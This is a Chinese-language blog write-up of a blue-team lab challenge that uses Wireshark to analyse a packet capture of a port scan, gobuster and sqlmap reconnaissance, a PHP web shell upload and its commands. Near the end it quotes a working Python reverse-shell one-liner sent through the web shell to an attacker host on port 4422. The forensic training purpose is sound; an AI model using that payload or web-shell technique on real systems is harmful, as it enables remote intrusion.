BLTO靶场-网络分析-Web Shell

admin 2022年8月28日16:53:03安全文章评论2 views1712字阅读5分42秒阅读模式

1、题目简介

1.1 背景介绍

SOC在其 SIEM 中收到“本地到本地端口扫描”警报,其中内部私有 IP 开始扫描另一个内部系统。您能否调查并确定此活动是否是恶意的?您已经获得了 PCAP,可以使用您希望使用的任何工具进行调查。

1.2 题目链接

BLTO靶场-网络分析-Web Shell

https://blueteamlabs.online/home/challenge/network-analysis-web-shell-d4d3a2821b

2、题目解析

2.1 负责进行端口扫描活动的 IP 是什么?

开始网络分析了解哪些主机在数据包捕获中进行通信,打开wireshark选择【统计】--【会话】,查看TCP会话状态。

BLTO靶场-网络分析-Web Shell

我们正在寻找端口扫描活动,这意味着一个 IP 地址扫描另一个 IP 地址上的所有端口,在TCP会话中选择对目标端口Port B进行排序,发现源IP地址10.251.96.4进行扫描。

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.2 可疑主机扫描的端口范围是多少?

针对目的端口进行排序,发现端口范围为1-1024

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.3 进行的端口扫描类型是什么?

针对攻击源IP10.251.96.4进行过滤,过滤方法:ip.src == 10.251.96.4,看到大量SYN数据包发送到每个端口10.251.96.5。这告诉我们进行了TCP SYN扫描。

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.4 另外两个工具用于对开放端口进行侦察,它们是什么?

1.第一个工具

要获得第一个侦察工具,我们可以查看User-Agent,通过过滤器ip.dst == 10.251.96.5 && http.user_agent查看过滤内容,通过GET请求查看User-Agent为gobuster 3.0.1

BLTO靶场-网络分析-Web Shell

2.第二个工具

    继续基于User-Agent判断,并通过过滤器ip.dst == 10.251.96.5 && http.user_agent && http.request.method == POST,查看比较长的一段内容,看到User-Agent为sqlmap 1.4.7

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.5 攻击者通过其上传 Web shell 的 php 文件的名称是什么?

当有人向网页发送信息时通过HTTP POST请求,过滤http.request.method==POST查找相关信息。通过upload.php页面上传2个文件,一个是PNG图片,一个是PHP文件。

BLTO靶场-网络分析-Web Shell

       查看Referer字段中内容,发现有http://10.251.96.5/editprofile.php信息

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.6 攻击者上传的 web shell 的名称是什么?

基于该POST上传,追踪HTTP流,分析原始HTTP请求信息

BLTO靶场-网络分析-Web Shell

发现上传文件名称为:dbfunctions.php

BLTO靶场-网络分析-Web Shell

2.7 Web shell 中用于执行命令的参数是什么?

查看上传文件的内容信息中为PHP代码,执行的命令参数为cmd

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.8 攻击者执行的第一个命令是什么?

根据获取到的webshell内容信息,基于GET请求作为过滤条件进行查询,过滤条件ip.dst == 10.251.96.5 && http.request.method == GET,查看请求执行内容为cmd=id

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

2.9 攻击者通过命令执行获得的shell连接类型是什么?

     在流量中还看到了一个通过 GET 方法发送的 python 代码

BLTO靶场-网络分析-Web Shell

查看详情信息,并通过URL解码发现脚本使用"socket"模块,该脚本连接到服务器并提供"/bin/sh"外壳。这种连接到远程服务器的方法用于启动反向 shell

BLTO靶场-网络分析-Web Shell

/uploads/dbfunctions.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.251.96.4",4422));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

BLTO靶场-网络分析-Web Shell

2.10 他用于 shell 连接的端口是什么?

基于解码后的内容查看,反弹shell连接的端口为4422

BLTO靶场-网络分析-Web Shell

BLTO靶场-网络分析-Web Shell

原文始发于微信公众号(安全孺子牛):BLTO靶场-网络分析-Web Shell

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日16:53:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  BLTO靶场-网络分析-Web Shell http://cn-sec.com/archives/1259177.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: